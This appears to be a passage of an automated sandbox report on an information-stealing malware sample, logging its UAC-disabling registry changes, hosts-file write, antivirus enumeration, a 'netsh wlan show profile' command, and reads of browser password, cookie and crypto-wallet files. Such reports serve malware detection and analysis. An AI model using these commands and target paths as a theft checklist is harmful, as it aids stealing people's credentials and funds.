    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
    Source: C:\agentInto\fontsessionruntime.exeQueries volume information: C:\agentInto\fontsessionruntime.exe VolumeInformation
    Source: C:\agentInto\fontsessionruntime.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
    Source: C:\agentInto\fontsessionruntime.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created: PromptOnSecureDesktop 0
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile written: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI66162\rarreg.key, type: DROPPED
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets

    Remote Access Functionality

    barindex
